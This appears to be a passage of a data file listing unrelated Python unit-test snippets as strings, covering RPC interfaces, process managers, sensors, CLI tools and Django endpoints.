mocked_get.call_args_list)\n # reset patches\n mocked_check.reset_mock()\n mocked_get.reset_mock()\n # test second RPC call with group namespec\n self.assertEqual([{'name': 'proc_1'}, {'name': 'proc_2'}],\n rpc.get_process_info('appli:*'))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*')], mocked_get.call_args_list)", "def pytest_runtest_makereport(item, call):\n if item.originalname == \"test_setup\" and call.when == \"call\":\n try:\n # TODO: not sure if this check is enough\n failed = not call.result == []\n except:\n # call does not have valid result attribute if some exception happended\n # during the test\n failed = True\n\n scenario = scenario_re.match(item.name).groups()[0]\n _scenario_setup_failed[scenario] = failed", "def test_start_application(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n from supvisors.ttypes import ApplicationStates\n # prepare context\n self.supervisor.supvisors.context.applications = {'appli_1': Mock()}\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_application\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_application('strategy', 'appli')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with unknown application\n with self.assertRaises(RPCError) as exc:\n rpc.start_application(0, 'appli')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual('BAD_NAME: appli', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running application\n application = self.supervisor.supvisors.context.applications['appli_1']\n for appli_state in [ApplicationStates.STOPPING, ApplicationStates.RUNNING,\n ApplicationStates.STARTING]:\n application.state = appli_state\n with self.assertRaises(RPCError) as exc:\n rpc.start_application(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: appli_1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped application\n # test no wait and not done\n application.state = ApplicationStates.STOPPED\n mocked_start.return_value = False\n result = rpc.start_application(0, 'appli_1', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test no wait and done\n application.state = ApplicationStates.STOPPED\n mocked_start.return_value = True\n result = rpc.start_application(0, 'appli_1', False)\n self.assertFalse(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test wait and done\n mocked_start.return_value = True\n result = rpc.start_application(0, 'appli_1')\n self.assertFalse(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_application(0, 'appli_1')\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and application not running\n mocked_progress.return_value = False\n for appli_state in [ApplicationStates.STOPPING, ApplicationStates.STOPPED,\n ApplicationStates.STARTING]:\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: appli_1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and application running\n application.state = ApplicationStates.RUNNING\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def test_get_start_true(self):\n\n tt = TemperatureTracker()\n tt.start()\n self.assertIsNotNone(tt.get_start())", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_get_run(self):\n pass", "def check_result(self, result):\n self.log.info(\"--check_result, result= %s\", result)\n if result[0]['exit_status'] != 0:\n self.fail(\"##Error detected from check_result\")\n else:\n self.log.info(\"--check_result passed\")", "def test_startService(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n # Schedule the process to start\r\n self.pm.startService()\r\n # advance the reactor to start the process\r\n self.reactor.advance(0)\r\n self.assertTrue(\"foo\" in self.pm.protocols)", "def test_fixture_available_results(tmp_sample_project):\n config_dir = tmp_sample_project\n output = subprocess.run([\"smif\", \"available_results\", \"energy_central\", \"-d\", config_dir],\n stdout=subprocess.PIPE)\n\n out_str = str(output.stdout)\n assert(out_str.count('model run: energy_central') == 1)\n assert(out_str.count('sos model: energy') == 1)\n assert(out_str.count('sector model:') == 1)\n assert(out_str.count('output:') == 2)\n assert(out_str.count('output: cost') == 1)\n assert(out_str.count('output: water_demand') == 1)\n assert(out_str.count('no results') == 2)\n assert(out_str.count('decision') == 0)\n\n # Run energy_central and re-check output with optional flag for completed results\n subprocess.run([\"smif\", \"run\", \"energy_central\", \"-d\", config_dir], stdout=subprocess.PIPE)\n output = subprocess.run([\"smif\", \"available_results\", \"energy_central\", \"-d\", config_dir],\n stdout=subprocess.PIPE)\n\n out_str = str(output.stdout)\n assert(out_str.count('model run: energy_central') == 1)\n assert(out_str.count('sos model: energy') == 1)\n assert(out_str.count('sector model:') == 1)\n assert(out_str.count('output:') == 2)\n assert(out_str.count('output: cost') == 1)\n assert(out_str.count('output: water_demand') == 1)\n assert(out_str.count('no results') == 0)\n assert(out_str.count('decision') == 8)\n assert(out_str.count('decision 1') == 2)\n assert(out_str.count('decision 2') == 2)\n assert(out_str.count('decision 3') == 2)\n assert(out_str.count('decision 4') == 2)\n assert(out_str.count(': 2010') == 4)\n assert(out_str.count(': 2015') == 2)\n assert(out_str.count(': 2020') == 2)", "def test_call(*args, **kwargs):\n try:\n subprocess.check_output(*args, **kwargs)\n return True\n except Exception:\n return False", "def test_get_process(self):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': 'first process'}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test with known application\n self.assertEqual('first process', rpc._get_process('proc_1'))\n # test with unknown application\n with self.assertRaises(RPCError) as exc:\n rpc._get_process('proc')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual('BAD_NAME: process proc unknown in Supvisors',\n exc.exception.text)", "def test_startProcess(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIsInstance(self.pm.protocols[\"foo\"], LoggingProtocol)\r\n self.assertIn(\"foo\", self.pm.timeStarted.keys())", "def process_ResultCheck(self):\n try:\n cmd = self.ExecutionTask.get_param().split(',')\n logging.debug(\"%s-%s-%s-%s-%s\" % ( TestScriptSymbolTable.get_value_from_sym_tab(cmd[0], TestScriptSymbolTable.test_script_sym_tab),cmd[0], cmd[1], cmd[2], cmd[3]))\n\n checkval = cmd[0].split('!') \n \n cval = TestScriptSymbolTable.get_value_from_sym_tab(checkval[1], TestScriptSymbolTable.capi_cmd_ret_sym_tab)\n\n if int(cval) >= int(cmd[1]):\n result = cmd[2]\n else:\n result = cmd[3]\n\n logging.info(\"\\nRESULT CHECK---> %15s\", result) \n self.setTestResult(result)\n \n #if result == 'FAIL':\n if 'FAIL' in result:\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n except OSError:\n logging.info(\"\\nException - ResultCheck\")", "def runTest(self):\n self.setUp()\n success = False\n message = ''\n try:\n self.command = [self.test_manager.executable_path]\n self.command.extend(self.test.spirv_args)\n\n process = subprocess.Popen(\n args=self.command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=self.directory)\n output = process.communicate(self.stdin_shader)\n test_status = TestStatus(self.test_manager, process.returncode, output[0],\n output[1], self.directory, self.inputs,\n self.file_shaders)\n run_results = [\n getattr(self.test, test_method)(test_status)\n for test_method in get_all_test_methods(self.test.__class__)\n ]\n success, message = zip(*run_results)\n success = all(success)\n message = '\\n'.join(message)\n except Exception as e:\n success = False\n message = str(e)\n self.test_manager.notify_result(\n self, success,\n message + '\\nSTDOUT:\\n%s\\nSTDERR:\\n%s' % (output[0], output[1]))\n self.tearDown()", "def test_success_result(self):\n dr = EventualResult(succeed(123), None)\n self.assertEqual(dr.wait(0.1), 123)", "def test_stopped_already_have_result(self):\n registry = ResultRegistry()\n er = EventualResult(succeed(123), None)\n registry.register(er)\n registry.stop()\n self.assertEqual(er.wait(0.1), 123)\n self.assertEqual(er.wait(0.1), 123)\n self.assertEqual(er.wait(0.1), 123)", "def test_conflicts(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': Mock(**{'conflicting.return_value': True,\n 'serial.return_value': {'name': 'proc_1'}}),\n 'proc_2': Mock(**{'conflicting.return_value': False,\n 'serial.return_value': {'name': 'proc_2'}}),\n 'proc_3': Mock(**{'conflicting.return_value': True,\n 'serial.return_value': {'name': 'proc_3'}})}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'proc_1'}, {'name': 'proc_3'}],\n rpc.get_conflicts())\n self.assertEqual([call()], mocked_check.call_args_list)", "def runTest(self):\n return True", "def test_isRunning_valve_pumpRunning(self):\n\t\tdef mock_def(uri, *args):\n\t\t\tif(uri == u\"ch.db.getdevicedata\"):\n\t\t\t\treturn {'name':'testValve', 'type':'valve', 'group':1, 'id':1, 'description': ''}\n\t\t\telif(uri == u\"ch.gpio.isrunning\"):\n\t\t\t\tif(args[0] == 1):\n\t\t\t\t\treturn True\n\t\t\t\telif(args[0] == 2):\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(\"Given device id does not exist ({})\".format(args[0]))\n\t\t\telif(uri == u\"ch.gpio.switch\"):\n\t\t\t\treturn \"success\"\n\t\t\telif(uri == u\"ch.db.getdevicegroup\"):\n\t\t\t\treturn [{'name':'testPump', 'type':'pump', 'group':1, 'id':2, 'description': ''}]\n\t\t\telse:\n\t\t\t\traise ValueError(\"Given URI does not exist ({})\".format(uri))\n\t\tdm = DeviceManager()\n\t\tdm.sessionID = None\n\t\tdm.call=MagicMock(side_effect=mock_def)\n\t\tdm.publish = MagicMock()\n\t\tself.failureResultOf(dm.switchIfAllowed('testValve', None), ApplicationError)", "def test_application_info(self, mocked_serial, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertEqual({'name': 'appli'}, rpc.get_application_info('dummy'))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('dummy')], mocked_serial.call_args_list)", "def test(self):\n return self._test(result_count=1, failure_amount=1)", "def test(self):\n return self._test(result_count=1, failure_amount=1)", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_integration(self):\n self.assertTrue(return_true())", "def test_rpcCall(self):\n pass", "def test_check_operating(self):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test the call to _check_state\n with patch.object(rpc, '_check_state') as mocked_check:\n rpc._check_operating()\n self.assertListEqual([call([2])], mocked_check.call_args_list)", "def test_registry(self):\n myreactor = FakeReactor()\n c = EventLoop(lambda: myreactor, lambda f, g: None)\n c.no_setup()\n\n @c.run_in_reactor\n def run():\n return\n\n result = run()\n self.assertIn(result, c._registry._results)", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def test_1_variantcall(install_test_files, data_dir):\n with make_workdir() as workdir:\n cl = [\"bcbio_nextgen.py\",\n get_post_process_yaml(data_dir, workdir),\n os.path.join(data_dir, os.pardir, \"100326_FC6107FAAXX\"),\n os.path.join(data_dir, \"run_info-variantcall.yaml\")]\n subprocess.check_call(cl)", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def checkRunning(procname):\n return procdata.checkRunning(procname)", "def testProcess(self):\n self.grr_hunt_osquery_collector.Process()\n # extract call kwargs\n call_kwargs = self.mock_grr_api.CreateHunt.call_args[1]\n self.assertEqual(call_kwargs['flow_args'].query,\n 'SELECT * FROM processes')\n self.assertEqual(call_kwargs['flow_args'].timeout_millis,\n 300000)\n self.assertEqual(call_kwargs['flow_args'].ignore_stderr_errors, False)\n self.assertEqual(call_kwargs['flow_name'], 'OsqueryFlow')\n self.assertEqual(call_kwargs['hunt_runner_args'].description,\n 'random reason')", "def test_process(self):\n xknx = XKNX(loop=self.loop)\n sensor = Sensor(\n xknx,\n 'TestSensor',\n value_type='temperature',\n group_address_state='1/2/3')\n\n telegram = Telegram(GroupAddress('1/2/3'))\n telegram.payload = DPTArray((0x06, 0xa0))\n self.loop.run_until_complete(asyncio.Task(sensor.process(telegram)))\n self.assertEqual(sensor.sensor_value.payload, DPTArray((0x06, 0xa0)))\n self.assertEqual(sensor.resolve_state(), 16.96)", "def test_service_initiated():\n assert \"ready\" in bkt_outcome_unwind.index()", "def run(self, result=None):\n\n with self.env_wrap():\n super(RelengToolTestCase, self).run(result)", "def test_make_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = subprocess.CalledProcessError(1, '', output=\"mocked error\")\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n package['make_targets'] = 'make_targets'\n issues = mtp.scan(package, 'level')\n assert not issues", "def testProcess(self, mock_get_write_results):\n self.mock_grr_api.Hunt.return_value.Get.return_value = \\\n mock_grr_hosts.MOCK_HUNT\n self.grr_hunt_downloader.Process()\n mock_get_write_results.assert_called_with(mock_grr_hosts.MOCK_HUNT,\n '/tmp/test')", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def testInThread(self):\n\n self.collectSensorData()\n self.moveHome()\n self.requestGrasp()\n result = self.waitForGenerateGraspsResult()\n graspFound = self.processGenerateGraspsResult(result)\n return graspFound", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def test_search_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"search master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search master instance from previous result\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n self.ins.runtime[\"route_instance_entry_list\"] = self.ins.get_route_instance_entry(mock_device_ins)\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n match_from_previous_response=True,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with brief and not interested counter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_BRIEF\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=1,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with detail\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_DETAIL\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=18,\n instance_rib_irib_holddown_count=0,\n )\n self.assertTrue(response)\n\n print(\"search instance info but entry don't have related parameter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=22,\n instance_rib_irib_holddown_count=0,\n )\n self.assertFalse(response)\n\n print(\"search instance info with extensive\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=0,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 16)", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def startTestHook(self):", "def run_starter(self, expect_to_fail=False):", "def test(self):\n \"\"\"WARNING: IT IS HIGHLY RECOMMENDED TO HAVE ONE TEST ONLY TO ISOLATE FUNCTIONAL TESTS FROM EACH OTHER. i.e. \n Start a new Python Interpreter and JVM for each test. In the end, it means only one test in this class. \"\"\"\n \n logger.info('**Starting test**')\n q = Queue()\n\n p = Process(target=self.client_process1, args=(q,))\n p.start()\n result = q.get()\n p.join()\n self.assertEqual(result, \"OK\") \n logger.debug(\"Restarting dataClay\")\n self.mock.mock.restartDataClay()\n p = Process(target=self.client_process2, args=(q,))\n p.start()\n result = q.get()\n p.join()\n self.assertEqual(result, \"OK\") \n\n logger.info(\"** Test OK!\")", "def runtest(self):", "def test_defaults_to_process_results(self, processor_mock):\n from furious.processors import _handle_results\n\n _handle_results({})\n\n processor_mock.assert_called_once_with()", "def test_run_process(self):\n workflow = self.get_workflow(\n \"\"\"file://result <- file://source\n echo result > result\n \"\"\")\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert path.isfile(\"result\")", "def test_result(self):\n result = compute()\n self.assertEqual(result, '4782')\n print(\"eulpy25Test passed\")", "def test_asdf_from_call():\n config_file = t_path(\n Path('steps') / 'jwst_generic_pars-makeliststep_0001.asdf'\n )\n results = MakeListStep.call(config_file=config_file)\n\n assert results == DEFAULT_RESULT", "def test_start_scan(self):\n pass", "def test_startProcessAlreadyStarted(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIdentical(None, self.pm.startProcess(\"foo\"))", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def v2_runner_on_ok(self, result, **kwargs):\n host = result._host\n print(json.dumps({host.name: result._result}, indent=4))", "def cb_test( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n self.post_to_queue( \"call\", self.helper_thread.test_test_ports , ( ) )", "def test_registry_login_positive(self, request_api_mock):\n result = registry_login(\"username\", \"password\")\n expected_result = \"key\"\n self.assertEqual(result, expected_result)\n request_api_mock.assert_called_once()", "def test_check_from_deployment(self):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test the call to _check_state\n with patch.object(rpc, '_check_state') as mocked_check:\n rpc._check_from_deployment()\n self.assertListEqual([call([1, 2, 3, 4, 5])], mocked_check.call_args_list)", "def test_retrieve_result(self):\n dr = EventualResult(Deferred(), None)\n uid = dr.stash()\n self.assertIdentical(dr, retrieve_result(uid))", "def test_working(self):\n mock_entry_working = mock.create_autospec(EntryPoint)\n mock_entry_working.name = \"Working\"\n mock_entry_working.load = self.successfulimport\n populate_entry_points([mock_entry_working])", "async def run_check_service(call):\r\n result = await run_check(str(hass.config.path()))\r\n hass.components.persistent_notification.async_create(\r\n result, \"Configuration Check Result\", NOTIFYID\r\n )\r\n if result == \"\\nConfiguration is OK!\\n\":\r\n finish_service = call.data.get(\"service\")\r\n finish_service_data = call.data.get(\"service_data\", {})\r\n if finish_service is not None:\r\n domain = finish_service.split(\".\")[0]\r\n service = finish_service.split(\".\")[1]\r\n await hass.services.async_call(domain, service, finish_service_data)", "def test_regular_result(self):\n passthrough = self.make_wrapped_function()\n result = passthrough(123)\n self.assertIsInstance(result, EventualResult)\n self.assertEqual(result.wait(0.1), 123)", "def test_fixture_list_runs(tmp_sample_project):\n config_dir = tmp_sample_project\n output = subprocess.run([\"smif\", \"list\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_water_cp_cr\" in str(output.stdout)\n assert \"energy_central\" in str(output.stdout)\n\n # Run energy_central and re-check output with optional flag for completed results\n subprocess.run([\"smif\", \"run\", \"energy_central\", \"-d\", config_dir], stdout=subprocess.PIPE)\n output = subprocess.run([\"smif\", \"list\", \"-c\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_central *\" in str(output.stdout)", "def test_process(self):\n xknx = XKNX()\n sensor = Sensor(\n xknx, \"TestSensor\", value_type=\"temperature\", group_address_state=\"1/2/3\"\n )\n\n telegram = Telegram(\n destination_address=GroupAddress(\"1/2/3\"),\n payload=GroupValueWrite(DPTArray((0x06, 0xA0))),\n )\n self.loop.run_until_complete(sensor.process(telegram))\n self.assertEqual(sensor.sensor_value.payload, DPTArray((0x06, 0xA0)))\n self.assertEqual(sensor.resolve_state(), 16.96)", "def test_ProstateReporting1(self):\n\n self.delayDisplay(\"Starting the test\")\n\n self.delayDisplay('Test passed!')", "def pytest_started_handling_group(session, worker):", "def waitUntilSuccess():", "def test_run(self):\n class MockProvider(BaseCoverageProvider):\n SERVICE_NAME = \"I do nothing\"\n was_run = False\n\n def run_once_and_update_timestamp(self):\n \"\"\"Set a variable.\"\"\"\n self.was_run = True\n return None\n\n provider = MockProvider(self._db)\n result = provider.run()\n\n # run_once_and_update_timestamp() was called.\n assert True == provider.was_run\n\n # run() returned a CoverageProviderProgress with basic\n # timing information, since run_once_and_update_timestamp()\n # didn't provide anything.\n assert isinstance(result, CoverageProviderProgress)\n now = utc_now()\n assert result.start < result.finish\n for time in (result.start, result.finish):\n assert (now - time).total_seconds() < 5", "def test_main_succeeds(app_tester: ApplicationTester) -> None:\n assert app_tester.execute(\"\") == 0", "def validate_Exec_Shell_Background(result, _dummy_command, _dummy_regex=None):\n return result is not None", "def test_run_simulation_stores_result(self):\n sim = ss.Simulation()\n assert sim.results == []\n sim.run_simulation(10)\n assert sim.results != []\n assert len(sim.results) == 10", "def test_lookup_adds_callback(self):\n # Reset event_loop so we start in a clean state.\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n self.event_loop = asyncio.get_event_loop()\n lookup = Lookup(FindValue, self.target, self.node, self.event_loop)\n lookup._handle_response = mock.MagicMock()\n keys = []\n for k, v in lookup.pending_requests.items():\n keys.append(k)\n v.set_result('foo')\n self.event_loop.run_until_complete(v)\n self.assertEqual(lookup._handle_response.call_count, 3)\n for i, key in enumerate(keys):\n # check the callback called _handle_response with the correct\n # arguments.\n arg_key = lookup._handle_response.call_args_list[i][0][0]\n self.assertEqual(arg_key, key)\n arg_contact = lookup._handle_response.call_args_list[i][0][1]\n self.assertIn(arg_contact, lookup.contacted)\n arg_future = lookup._handle_response.call_args_list[i][0][2]\n self.assertEqual(arg_future.result(), 'foo')", "def test_run_prefix__success(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "def testing(self):\n print('test successful')", "async def test1(self):\n return True", "def test_calls_success_callback(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n call_count = []\n\n def do_things():\n call_count.append(1)\n\n work = Async(target=dir, args=[1],\n callbacks={'success': do_things})\n\n with _ExecutionContext(work):\n run_job()\n\n self.assertEqual(1, len(call_count))", "def test_BLINK_LAUNCH_PROCESS(self):\n self.verify_references_to_prerequisites(processes.BLINK_LAUNCH_PROCESS)", "def test_execution(self):\n self.assertTrue(True)", "def execute(self):\n\n self._status = 'Running'\n\n try:\n self._init_staf_handle()\n 